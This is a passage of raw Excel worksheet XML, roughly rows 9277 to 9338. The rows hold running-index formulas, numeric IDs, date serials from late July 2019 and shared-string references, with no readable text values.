      </c>
      <c r="D9277" s="1">
        <v>43671</v>
      </c>
      <c r="E9277" t="s">
        <v>18218</v>
      </c>
      <c r="F9277" t="s">
        <v>9975</v>
      </c>
      <c r="G9277" t="s">
        <v>18219</v>
      </c>
    </row>
    <row r="9278" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9278">
        <f t="shared" si="144"/>
        <v>9277</v>
      </c>
      <c r="B9278">
        <v>4277</v>
      </c>
      <c r="C9278" t="s">
        <v>9973</v>
      </c>
      <c r="D9278" s="1">
        <v>43671</v>
      </c>
      <c r="E9278" t="s">
        <v>18220</v>
      </c>
      <c r="F9278" t="s">
        <v>9975</v>
      </c>
      <c r="G9278" t="s">
        <v>18221</v>
      </c>
    </row>
    <row r="9279" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9279">
        <f t="shared" si="144"/>
        <v>9278</v>
      </c>
      <c r="B9279">
        <v>4278</v>
      </c>
      <c r="C9279" t="s">
        <v>9973</v>
      </c>
      <c r="D9279" s="1">
        <v>43668</v>
      </c>
      <c r="E9279" t="s">
        <v>18222</v>
      </c>
      <c r="F9279" t="s">
        <v>10021</v>
      </c>
      <c r="G9279" t="s">
        <v>18223</v>
      </c>
    </row>
    <row r="9280" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9280">
        <f t="shared" si="144"/>
        <v>9279</v>
      </c>
      <c r="B9280">
        <v>4279</v>
      </c>
      <c r="C9280" t="s">
        <v>9973</v>
      </c>
      <c r="D9280" s="1">
        <v>43677</v>
      </c>
      <c r="E9280" t="s">
        <v>18224</v>
      </c>
      <c r="F9280" t="s">
        <v>9975</v>
      </c>
      <c r="G9280" t="s">
        <v>18225</v>
      </c>
    </row>
    <row r="9281" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9281">
        <f t="shared" si="144"/>
        <v>9280</v>
      </c>
      <c r="B9281">
        <v>4280</v>
      </c>
      <c r="C9281" t="s">
        <v>9973</v>
      </c>
      <c r="D9281" s="1">
        <v>43672</v>
      </c>
      <c r="E9281" t="s">
        <v>18226</v>
      </c>
      <c r="F9281" t="s">
        <v>9975</v>
      </c>
      <c r="G9281" t="s">
        <v>18227</v>
      </c>
    </row>
    <row r="9282" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9282">
        <f t="shared" si="144"/>
        <v>9281</v>
      </c>
      <c r="B9282">
        <v>4281</v>
      </c>
      <c r="C9282" t="s">
        <v>9973</v>
      </c>
      <c r="D9282" s="1">
        <v>43669</v>
      </c>
      <c r="E9282" t="s">
        <v>18228</v>
      </c>
      <c r="F9282" t="s">
        <v>9978</v>
      </c>
      <c r="G9282" t="s">
        <v>18229</v>
      </c>
    </row>
    <row r="9283" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9283">
        <f t="shared" ref="A9283:A9346" si="145">+ROW(A9282)</f>
        <v>9282</v>
      </c>
      <c r="B9283">
        <v>4282</v>
      </c>
      <c r="C9283" t="s">
        <v>9973</v>
      </c>
      <c r="D9283" s="1">
        <v>43671</v>
      </c>
      <c r="E9283" t="s">
        <v>18230</v>
      </c>
      <c r="F9283" t="s">
        <v>9975</v>
      </c>
      <c r="G9283" t="s">
        <v>18231</v>
      </c>
    </row>
    <row r="9284" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9284">
        <f t="shared" si="145"/>
        <v>9283</v>
      </c>
      <c r="B9284">
        <v>4283</v>
      </c>
      <c r="C9284" t="s">
        <v>9973</v>
      </c>
      <c r="D9284" s="1">
        <v>43675</v>
      </c>
      <c r="E9284" t="s">
        <v>18232</v>
      </c>
      <c r="F9284" t="s">
        <v>9975</v>
      </c>
      <c r="G9284" t="s">
        <v>18233</v>
      </c>
    </row>
    <row r="9285" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9285">
        <f t="shared" si="145"/>
        <v>9284</v>
      </c>
      <c r="B9285">
        <v>4284</v>
      </c>
      <c r="C9285" t="s">
        <v>9973</v>
      </c>
      <c r="D9285" s="1">
        <v>43669</v>
      </c>
      <c r="E9285" t="s">
        <v>18234</v>
      </c>
      <c r="F9285" t="s">
        <v>9975</v>
      </c>
      <c r="G9285" t="s">
        <v>18235</v>
      </c>
    </row>
    <row r="9286" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9286">
        <f t="shared" si="145"/>
        <v>9285</v>
      </c>
      <c r="B9286">
        <v>4285</v>
      </c>
      <c r="C9286" t="s">
        <v>9973</v>
      </c>
      <c r="D9286" s="1">
        <v>43673</v>
      </c>
      <c r="E9286" t="s">
        <v>18236</v>
      </c>
      <c r="F9286" t="s">
        <v>9975</v>
      </c>
      <c r="G9286" t="s">
        <v>18237</v>
      </c>
    </row>
    <row r="9287" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9287">
        <f t="shared" si="145"/>
        <v>9286</v>
      </c>
      <c r="B9287">
        <v>4286</v>
      </c>
      <c r="C9287" t="s">
        <v>9973</v>
      </c>
      <c r="D9287" s="1">
        <v>43674</v>
      </c>
      <c r="E9287" t="s">
        <v>18238</v>
      </c>
      <c r="F9287" t="s">
        <v>9975</v>
      </c>
      <c r="G9287" t="s">
        <v>18239</v>
      </c>
    </row>
    <row r="9288" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9288">
        <f t="shared" si="145"/>
        <v>9287</v>
      </c>
      <c r="B9288">
        <v>4287</v>
      </c>
      <c r="C9288" t="s">
        <v>9973</v>
      </c>
      <c r="D9288" s="1">
        <v>43668</v>
      </c>
      <c r="E9288" t="s">
        <v>18240</v>
      </c>
      <c r="F9288" t="s">
        <v>9975</v>
      </c>
      <c r="G9288" t="s">
        <v>18241</v>
      </c>
    </row>
    <row r="9289" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9289">
        <f t="shared" si="145"/>
        <v>9288</v>
      </c>
      <c r="B9289">
        <v>4288</v>
      </c>
      <c r="C9289" t="s">
        <v>9973</v>
      </c>
      <c r="D9289" s="1">
        <v>43668</v>
      </c>
      <c r="E9289" t="s">
        <v>10351</v>
      </c>
      <c r="F9289" t="s">
        <v>9975</v>
      </c>
      <c r="G9289" t="s">
        <v>18242</v>
      </c>
    </row>
    <row r="9290" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9290">
        <f t="shared" si="145"/>
        <v>9289</v>
      </c>
      <c r="B9290">
        <v>4289</v>
      </c>
      <c r="C9290" t="s">
        <v>9973</v>
      </c>
      <c r="D9290" s="1">
        <v>43676</v>
      </c>
      <c r="E9290" t="s">
        <v>18243</v>
      </c>
      <c r="F9290" t="s">
        <v>9975</v>
      </c>
      <c r="G9290" t="s">
        <v>18244</v>
      </c>
    </row>
    <row r="9291" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9291">
        <f t="shared" si="145"/>
        <v>9290</v>
      </c>
      <c r="B9291">
        <v>4290</v>
      </c>
      <c r="C9291" t="s">
        <v>9973</v>
      </c>
      <c r="D9291" s="1">
        <v>43671</v>
      </c>
      <c r="E9291" t="s">
        <v>18245</v>
      </c>
      <c r="F9291" t="s">
        <v>9975</v>
      </c>
      <c r="G9291" t="s">
        <v>18246</v>
      </c>
    </row>
    <row r="9292" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9292">
        <f t="shared" si="145"/>
        <v>9291</v>
      </c>
      <c r="B9292">
        <v>4291</v>
      </c>
      <c r="C9292" t="s">
        <v>9973</v>
      </c>
      <c r="D9292" s="1">
        <v>43671</v>
      </c>
      <c r="E9292" t="s">
        <v>18247</v>
      </c>
      <c r="F9292" t="s">
        <v>9975</v>
      </c>
      <c r="G9292" t="s">
        <v>18248</v>
      </c>
    </row>
    <row r="9293" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9293">
        <f t="shared" si="145"/>
        <v>9292</v>
      </c>
      <c r="B9293">
        <v>4292</v>
      </c>
      <c r="C9293" t="s">
        <v>9973</v>
      </c>
      <c r="D9293" s="1">
        <v>43668</v>
      </c>
      <c r="E9293" t="s">
        <v>18249</v>
      </c>
      <c r="F9293" t="s">
        <v>9975</v>
      </c>
      <c r="G9293" t="s">
        <v>18250</v>
      </c>
    </row>
    <row r="9294" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9294">
        <f t="shared" si="145"/>
        <v>9293</v>
      </c>
      <c r="B9294">
        <v>4293</v>
      </c>
      <c r="C9294" t="s">
        <v>9973</v>
      </c>
      <c r="D9294" s="1">
        <v>43677</v>
      </c>
      <c r="E9294" t="s">
        <v>18251</v>
      </c>
      <c r="F9294" t="s">
        <v>9975</v>
      </c>
      <c r="G9294" t="s">
        <v>18252</v>
      </c>
    </row>
    <row r="9295" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9295">
        <f t="shared" si="145"/>
        <v>9294</v>
      </c>
      <c r="B9295">
        <v>4294</v>
      </c>
      <c r="C9295" t="s">
        <v>9973</v>
      </c>
      <c r="D9295" s="1">
        <v>43673</v>
      </c>
      <c r="E9295" t="s">
        <v>18253</v>
      </c>
      <c r="F9295" t="s">
        <v>9975</v>
      </c>
      <c r="G9295" t="s">
        <v>18254</v>
      </c>
    </row>
    <row r="9296" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9296">
        <f t="shared" si="145"/>
        <v>9295</v>
      </c>
      <c r="B9296">
        <v>4295</v>
      </c>
      <c r="C9296" t="s">
        <v>9973</v>
      </c>
      <c r="D9296" s="1">
        <v>43673</v>
      </c>
      <c r="E9296" t="s">
        <v>18255</v>
      </c>
      <c r="F9296" t="s">
        <v>10021</v>
      </c>
      <c r="G9296" t="s">
        <v>18256</v>
      </c>
    </row>
    <row r="9297" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9297">
        <f t="shared" si="145"/>
        <v>9296</v>
      </c>
      <c r="B9297">
        <v>4296</v>
      </c>
      <c r="C9297" t="s">
        <v>9973</v>
      </c>
      <c r="D9297" s="1">
        <v>43671</v>
      </c>
      <c r="E9297" t="s">
        <v>18257</v>
      </c>
      <c r="F9297" t="s">
        <v>9975</v>
      </c>
      <c r="G9297" t="s">
        <v>18258</v>
      </c>
    </row>
    <row r="9298" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9298">
        <f t="shared" si="145"/>
        <v>9297</v>
      </c>
      <c r="B9298">
        <v>4297</v>
      </c>
      <c r="C9298" t="s">
        <v>9973</v>
      </c>
      <c r="D9298" s="1">
        <v>43674</v>
      </c>
      <c r="E9298" t="s">
        <v>18259</v>
      </c>
      <c r="F9298" t="s">
        <v>9975</v>
      </c>
      <c r="G9298" t="s">
        <v>18260</v>
      </c>
    </row>
    <row r="9299" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9299">
        <f t="shared" si="145"/>
        <v>9298</v>
      </c>
      <c r="B9299">
        <v>4298</v>
      </c>
      <c r="C9299" t="s">
        <v>9973</v>
      </c>
      <c r="D9299" s="1">
        <v>43670</v>
      </c>
      <c r="E9299" t="s">
        <v>18261</v>
      </c>
      <c r="F9299" t="s">
        <v>9975</v>
      </c>
      <c r="G9299" t="s">
        <v>18262</v>
      </c>
    </row>
    <row r="9300" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9300">
        <f t="shared" si="145"/>
        <v>9299</v>
      </c>
      <c r="B9300">
        <v>4299</v>
      </c>
      <c r="C9300" t="s">
        <v>9973</v>
      </c>
      <c r="D9300" s="1">
        <v>43676</v>
      </c>
      <c r="E9300" t="s">
        <v>18263</v>
      </c>
      <c r="F9300" t="s">
        <v>9975</v>
      </c>
      <c r="G9300" t="s">
        <v>18264</v>
      </c>
    </row>
    <row r="9301" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9301">
        <f t="shared" si="145"/>
        <v>9300</v>
      </c>
      <c r="B9301">
        <v>4300</v>
      </c>
      <c r="C9301" t="s">
        <v>9973</v>
      </c>
      <c r="D9301" s="1">
        <v>43673</v>
      </c>
      <c r="E9301" t="s">
        <v>18265</v>
      </c>
      <c r="F9301" t="s">
        <v>9975</v>
      </c>
      <c r="G9301" t="s">
        <v>18266</v>
      </c>
    </row>
    <row r="9302" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9302">
        <f t="shared" si="145"/>
        <v>9301</v>
      </c>
      <c r="B9302">
        <v>4301</v>
      </c>
      <c r="C9302" t="s">
        <v>9973</v>
      </c>
      <c r="D9302" s="1">
        <v>43670</v>
      </c>
      <c r="E9302" t="s">
        <v>18267</v>
      </c>
      <c r="F9302" t="s">
        <v>9975</v>
      </c>
      <c r="G9302" t="s">
        <v>18268</v>
      </c>
    </row>
    <row r="9303" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9303">
        <f t="shared" si="145"/>
        <v>9302</v>
      </c>
      <c r="B9303">
        <v>4302</v>
      </c>
      <c r="C9303" t="s">
        <v>9973</v>
      </c>
      <c r="D9303" s="1">
        <v>43672</v>
      </c>
      <c r="E9303" t="s">
        <v>18269</v>
      </c>
      <c r="F9303" t="s">
        <v>9975</v>
      </c>
      <c r="G9303" t="s">
        <v>18270</v>
      </c>
    </row>
    <row r="9304" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9304">
        <f t="shared" si="145"/>
        <v>9303</v>
      </c>
      <c r="B9304">
        <v>4303</v>
      </c>
      <c r="C9304" t="s">
        <v>9973</v>
      </c>
      <c r="D9304" s="1">
        <v>43675</v>
      </c>
      <c r="E9304" t="s">
        <v>18271</v>
      </c>
      <c r="F9304" t="s">
        <v>9975</v>
      </c>
      <c r="G9304" t="s">
        <v>18272</v>
      </c>
    </row>
    <row r="9305" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9305">
        <f t="shared" si="145"/>
        <v>9304</v>
      </c>
      <c r="B9305">
        <v>4304</v>
      </c>
      <c r="C9305" t="s">
        <v>9973</v>
      </c>
      <c r="D9305" s="1">
        <v>43669</v>
      </c>
      <c r="E9305" t="s">
        <v>18273</v>
      </c>
      <c r="F9305" t="s">
        <v>9975</v>
      </c>
      <c r="G9305" t="s">
        <v>18274</v>
      </c>
    </row>
    <row r="9306" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9306">
        <f t="shared" si="145"/>
        <v>9305</v>
      </c>
      <c r="B9306">
        <v>4305</v>
      </c>
      <c r="C9306" t="s">
        <v>9973</v>
      </c>
      <c r="D9306" s="1">
        <v>43670</v>
      </c>
      <c r="E9306" t="s">
        <v>18275</v>
      </c>
      <c r="F9306" t="s">
        <v>9975</v>
      </c>
      <c r="G9306" t="s">
        <v>18276</v>
      </c>
    </row>
    <row r="9307" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9307">
        <f t="shared" si="145"/>
        <v>9306</v>
      </c>
      <c r="B9307">
        <v>4306</v>
      </c>
      <c r="C9307" t="s">
        <v>9973</v>
      </c>
      <c r="D9307" s="1">
        <v>43672</v>
      </c>
      <c r="E9307" t="s">
        <v>18277</v>
      </c>
      <c r="F9307" t="s">
        <v>9975</v>
      </c>
      <c r="G9307" t="s">
        <v>18278</v>
      </c>
    </row>
    <row r="9308" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9308">
        <f t="shared" si="145"/>
        <v>9307</v>
      </c>
      <c r="B9308">
        <v>4307</v>
      </c>
      <c r="C9308" t="s">
        <v>9973</v>
      </c>
      <c r="D9308" s="1">
        <v>43668</v>
      </c>
      <c r="E9308" t="s">
        <v>18279</v>
      </c>
      <c r="F9308" t="s">
        <v>9975</v>
      </c>
      <c r="G9308" t="s">
        <v>18280</v>
      </c>
    </row>
    <row r="9309" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9309">
        <f t="shared" si="145"/>
        <v>9308</v>
      </c>
      <c r="B9309">
        <v>4308</v>
      </c>
      <c r="C9309" t="s">
        <v>9973</v>
      </c>
      <c r="D9309" s="1">
        <v>43673</v>
      </c>
      <c r="E9309" t="s">
        <v>18281</v>
      </c>
      <c r="F9309" t="s">
        <v>9975</v>
      </c>
      <c r="G9309" t="s">
        <v>18282</v>
      </c>
    </row>
    <row r="9310" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9310">
        <f t="shared" si="145"/>
        <v>9309</v>
      </c>
      <c r="B9310">
        <v>4309</v>
      </c>
      <c r="C9310" t="s">
        <v>9973</v>
      </c>
      <c r="D9310" s="1">
        <v>43674</v>
      </c>
      <c r="E9310" t="s">
        <v>18283</v>
      </c>
      <c r="F9310" t="s">
        <v>10021</v>
      </c>
      <c r="G9310" t="s">
        <v>18284</v>
      </c>
    </row>
    <row r="9311" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9311">
        <f t="shared" si="145"/>
        <v>9310</v>
      </c>
      <c r="B9311">
        <v>4310</v>
      </c>
      <c r="C9311" t="s">
        <v>9973</v>
      </c>
      <c r="D9311" s="1">
        <v>43669</v>
      </c>
      <c r="E9311" t="s">
        <v>18285</v>
      </c>
      <c r="F9311" t="s">
        <v>9975</v>
      </c>
      <c r="G9311" t="s">
        <v>18286</v>
      </c>
    </row>
    <row r="9312" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9312">
        <f t="shared" si="145"/>
        <v>9311</v>
      </c>
      <c r="B9312">
        <v>4311</v>
      </c>
      <c r="C9312" t="s">
        <v>9973</v>
      </c>
      <c r="D9312" s="1">
        <v>43674</v>
      </c>
      <c r="E9312" t="s">
        <v>18287</v>
      </c>
      <c r="F9312" t="s">
        <v>9975</v>
      </c>
      <c r="G9312" t="s">
        <v>18288</v>
      </c>
    </row>
    <row r="9313" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9313">
        <f t="shared" si="145"/>
        <v>9312</v>
      </c>
      <c r="B9313">
        <v>4312</v>
      </c>
      <c r="C9313" t="s">
        <v>9973</v>
      </c>
      <c r="D9313" s="1">
        <v>43675</v>
      </c>
      <c r="E9313" t="s">
        <v>18289</v>
      </c>
      <c r="F9313" t="s">
        <v>9975</v>
      </c>
      <c r="G9313" t="s">
        <v>18290</v>
      </c>
    </row>
    <row r="9314" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9314">
        <f t="shared" si="145"/>
        <v>9313</v>
      </c>
      <c r="B9314">
        <v>4313</v>
      </c>
      <c r="C9314" t="s">
        <v>9973</v>
      </c>
      <c r="D9314" s="1">
        <v>43671</v>
      </c>
      <c r="E9314" t="s">
        <v>18291</v>
      </c>
      <c r="F9314" t="s">
        <v>9975</v>
      </c>
      <c r="G9314" t="s">
        <v>18292</v>
      </c>
    </row>
    <row r="9315" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9315">
        <f t="shared" si="145"/>
        <v>9314</v>
      </c>
      <c r="B9315">
        <v>4314</v>
      </c>
      <c r="C9315" t="s">
        <v>9973</v>
      </c>
      <c r="D9315" s="1">
        <v>43672</v>
      </c>
      <c r="E9315" t="s">
        <v>10018</v>
      </c>
      <c r="F9315" t="s">
        <v>9975</v>
      </c>
      <c r="G9315" t="s">
        <v>18293</v>
      </c>
    </row>
    <row r="9316" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9316">
        <f t="shared" si="145"/>
        <v>9315</v>
      </c>
      <c r="B9316">
        <v>4315</v>
      </c>
      <c r="C9316" t="s">
        <v>9973</v>
      </c>
      <c r="D9316" s="1">
        <v>43672</v>
      </c>
      <c r="E9316" t="s">
        <v>18294</v>
      </c>
      <c r="F9316" t="s">
        <v>9975</v>
      </c>
      <c r="G9316" t="s">
        <v>18295</v>
      </c>
    </row>
    <row r="9317" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9317">
        <f t="shared" si="145"/>
        <v>9316</v>
      </c>
      <c r="B9317">
        <v>4316</v>
      </c>
      <c r="C9317" t="s">
        <v>9973</v>
      </c>
      <c r="D9317" s="1">
        <v>43672</v>
      </c>
      <c r="E9317" t="s">
        <v>18296</v>
      </c>
      <c r="F9317" t="s">
        <v>9975</v>
      </c>
      <c r="G9317" t="s">
        <v>18297</v>
      </c>
    </row>
    <row r="9318" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9318">
        <f t="shared" si="145"/>
        <v>9317</v>
      </c>
      <c r="B9318">
        <v>4317</v>
      </c>
      <c r="C9318" t="s">
        <v>9973</v>
      </c>
      <c r="D9318" s="1">
        <v>43677</v>
      </c>
      <c r="E9318" t="s">
        <v>18298</v>
      </c>
      <c r="F9318" t="s">
        <v>9975</v>
      </c>
      <c r="G9318" t="s">
        <v>18299</v>
      </c>
    </row>
    <row r="9319" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9319">
        <f t="shared" si="145"/>
        <v>9318</v>
      </c>
      <c r="B9319">
        <v>4318</v>
      </c>
      <c r="C9319" t="s">
        <v>9973</v>
      </c>
      <c r="D9319" s="1">
        <v>43672</v>
      </c>
      <c r="E9319" t="s">
        <v>12035</v>
      </c>
      <c r="F9319" t="s">
        <v>9975</v>
      </c>
      <c r="G9319" t="s">
        <v>18300</v>
      </c>
    </row>
    <row r="9320" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9320">
        <f t="shared" si="145"/>
        <v>9319</v>
      </c>
      <c r="B9320">
        <v>4319</v>
      </c>
      <c r="C9320" t="s">
        <v>9973</v>
      </c>
      <c r="D9320" s="1">
        <v>43676</v>
      </c>
      <c r="E9320" t="s">
        <v>18301</v>
      </c>
      <c r="F9320" t="s">
        <v>9975</v>
      </c>
      <c r="G9320" t="s">
        <v>18302</v>
      </c>
    </row>
    <row r="9321" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9321">
        <f t="shared" si="145"/>
        <v>9320</v>
      </c>
      <c r="B9321">
        <v>4320</v>
      </c>
      <c r="C9321" t="s">
        <v>9973</v>
      </c>
      <c r="D9321" s="1">
        <v>43677</v>
      </c>
      <c r="E9321" t="s">
        <v>18303</v>
      </c>
      <c r="F9321" t="s">
        <v>9975</v>
      </c>
      <c r="G9321" t="s">
        <v>18304</v>
      </c>
    </row>
    <row r="9322" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9322">
        <f t="shared" si="145"/>
        <v>9321</v>
      </c>
      <c r="B9322">
        <v>4321</v>
      </c>
      <c r="C9322" t="s">
        <v>9973</v>
      </c>
      <c r="D9322" s="1">
        <v>43668</v>
      </c>
      <c r="E9322" t="s">
        <v>18305</v>
      </c>
      <c r="F9322" t="s">
        <v>9975</v>
      </c>
      <c r="G9322" t="s">
        <v>18306</v>
      </c>
    </row>
    <row r="9323" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9323">
        <f t="shared" si="145"/>
        <v>9322</v>
      </c>
      <c r="B9323">
        <v>4322</v>
      </c>
      <c r="C9323" t="s">
        <v>9973</v>
      </c>
      <c r="D9323" s="1">
        <v>43675</v>
      </c>
      <c r="E9323" t="s">
        <v>18307</v>
      </c>
      <c r="F9323" t="s">
        <v>9975</v>
      </c>
      <c r="G9323" t="s">
        <v>18308</v>
      </c>
    </row>
    <row r="9324" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9324">
        <f t="shared" si="145"/>
        <v>9323</v>
      </c>
      <c r="B9324">
        <v>4323</v>
      </c>
      <c r="C9324" t="s">
        <v>9973</v>
      </c>
      <c r="D9324" s="1">
        <v>43671</v>
      </c>
      <c r="E9324" t="s">
        <v>18309</v>
      </c>
      <c r="F9324" t="s">
        <v>9975</v>
      </c>
    </row>
    <row r="9325" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9325">
        <f t="shared" si="145"/>
        <v>9324</v>
      </c>
      <c r="B9325">
        <v>4324</v>
      </c>
      <c r="C9325" t="s">
        <v>9973</v>
      </c>
      <c r="D9325" s="1">
        <v>43670</v>
      </c>
      <c r="E9325" t="s">
        <v>18310</v>
      </c>
      <c r="F9325" t="s">
        <v>9975</v>
      </c>
      <c r="G9325" t="s">
        <v>18311</v>
      </c>
    </row>
    <row r="9326" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9326">
        <f t="shared" si="145"/>
        <v>9325</v>
      </c>
      <c r="B9326">
        <v>4325</v>
      </c>
      <c r="C9326" t="s">
        <v>9973</v>
      </c>
      <c r="D9326" s="1">
        <v>43671</v>
      </c>
      <c r="E9326" t="s">
        <v>18312</v>
      </c>
      <c r="F9326" t="s">
        <v>9975</v>
      </c>
      <c r="G9326" t="s">
        <v>18313</v>
      </c>
    </row>
    <row r="9327" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9327">
        <f t="shared" si="145"/>
        <v>9326</v>
      </c>
      <c r="B9327">
        <v>4326</v>
      </c>
      <c r="C9327" t="s">
        <v>9973</v>
      </c>
      <c r="D9327" s="1">
        <v>43672</v>
      </c>
      <c r="E9327" t="s">
        <v>18314</v>
      </c>
      <c r="F9327" t="s">
        <v>9975</v>
      </c>
      <c r="G9327" t="s">
        <v>18315</v>
      </c>
    </row>
    <row r="9328" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9328">
        <f t="shared" si="145"/>
        <v>9327</v>
      </c>
      <c r="B9328">
        <v>4327</v>
      </c>
      <c r="C9328" t="s">
        <v>9973</v>
      </c>
      <c r="D9328" s="1">
        <v>43677</v>
      </c>
      <c r="E9328" t="s">
        <v>18316</v>
      </c>
      <c r="F9328" t="s">
        <v>9975</v>
      </c>
      <c r="G9328" t="s">
        <v>18317</v>
      </c>
    </row>
    <row r="9329" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9329">
        <f t="shared" si="145"/>
        <v>9328</v>
      </c>
      <c r="B9329">
        <v>4328</v>
      </c>
      <c r="C9329" t="s">
        <v>9973</v>
      </c>
      <c r="D9329" s="1">
        <v>43672</v>
      </c>
      <c r="E9329" t="s">
        <v>18318</v>
      </c>
      <c r="F9329" t="s">
        <v>9975</v>
      </c>
      <c r="G9329" t="s">
        <v>18319</v>
      </c>
    </row>
    <row r="9330" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9330">
        <f t="shared" si="145"/>
        <v>9329</v>
      </c>
      <c r="B9330">
        <v>4329</v>
      </c>
      <c r="C9330" t="s">
        <v>9973</v>
      </c>
      <c r="D9330" s="1">
        <v>43677</v>
      </c>
      <c r="E9330" t="s">
        <v>18320</v>
      </c>
      <c r="F9330" t="s">
        <v>10021</v>
      </c>
      <c r="G9330" t="s">
        <v>18321</v>
      </c>
    </row>
    <row r="9331" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9331">
        <f t="shared" si="145"/>
        <v>9330</v>
      </c>
      <c r="B9331">
        <v>4330</v>
      </c>
      <c r="C9331" t="s">
        <v>9973</v>
      </c>
      <c r="D9331" s="1">
        <v>43675</v>
      </c>
      <c r="E9331" t="s">
        <v>18322</v>
      </c>
      <c r="F9331" t="s">
        <v>9975</v>
      </c>
      <c r="G9331" t="s">
        <v>18323</v>
      </c>
    </row>
    <row r="9332" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9332">
        <f t="shared" si="145"/>
        <v>9331</v>
      </c>
      <c r="B9332">
        <v>4331</v>
      </c>
      <c r="C9332" t="s">
        <v>9973</v>
      </c>
      <c r="D9332" s="1">
        <v>43675</v>
      </c>
      <c r="E9332" t="s">
        <v>18324</v>
      </c>
      <c r="F9332" t="s">
        <v>9975</v>
      </c>
      <c r="G9332" t="s">
        <v>18325</v>
      </c>
    </row>
    <row r="9333" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9333">
        <f t="shared" si="145"/>
        <v>9332</v>
      </c>
      <c r="B9333">
        <v>4332</v>
      </c>
      <c r="C9333" t="s">
        <v>9973</v>
      </c>
      <c r="D9333" s="1">
        <v>43671</v>
      </c>
      <c r="E9333" t="s">
        <v>18326</v>
      </c>
      <c r="F9333" t="s">
        <v>9975</v>
      </c>
      <c r="G9333" t="s">
        <v>18327</v>
      </c>
    </row>
    <row r="9334" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9334">
        <f t="shared" si="145"/>
        <v>9333</v>
      </c>
      <c r="B9334">
        <v>4333</v>
      </c>
      <c r="C9334" t="s">
        <v>9973</v>
      </c>
      <c r="D9334" s="1">
        <v>43669</v>
      </c>
      <c r="E9334" t="s">
        <v>18328</v>
      </c>
      <c r="F9334" t="s">
        <v>9975</v>
      </c>
      <c r="G9334" t="s">
        <v>18329</v>
      </c>
    </row>
    <row r="9335" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9335">
        <f t="shared" si="145"/>
        <v>9334</v>
      </c>
      <c r="B9335">
        <v>4334</v>
      </c>
      <c r="C9335" t="s">
        <v>9973</v>
      </c>
      <c r="D9335" s="1">
        <v>43669</v>
      </c>
      <c r="E9335" t="s">
        <v>18330</v>
      </c>
      <c r="F9335" t="s">
        <v>9975</v>
      </c>
      <c r="G9335" t="s">
        <v>18331</v>
      </c>
    </row>
    <row r="9336" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9336">
        <f t="shared" si="145"/>
        <v>9335</v>
      </c>
      <c r="B9336">
        <v>4335</v>
      </c>
      <c r="C9336" t="s">
        <v>9973</v>
      </c>
      <c r="D9336" s="1">
        <v>43672</v>
      </c>
      <c r="E9336" t="s">
        <v>18332</v>
      </c>
      <c r="F9336" t="s">
        <v>9975</v>
      </c>
      <c r="G9336" t="s">
        <v>18333</v>
      </c>
    </row>
    <row r="9337" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9337">
        <f t="shared" si="145"/>
        <v>9336</v>
      </c>
      <c r="B9337">
        <v>4336</v>
      </c>
      <c r="C9337" t="s">
        <v>9973</v>
      </c>
      <c r="D9337" s="1">
        <v>43672</v>
      </c>
      <c r="E9337" t="s">
        <v>18334</v>
      </c>
      <c r="F9337" t="s">
        <v>9975</v>
      </c>
      <c r="G9337" t="s">
        <v>18335</v>
      </c>
    </row>
    <row r="9338" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9338">
        <f t="shared" si="145"/>
        <v>9337</v>
      </c>
      <c r="B9338">
        <v>4337</v>
      </c>
      <c r="C9338" t="s">
        <v>9973</v>
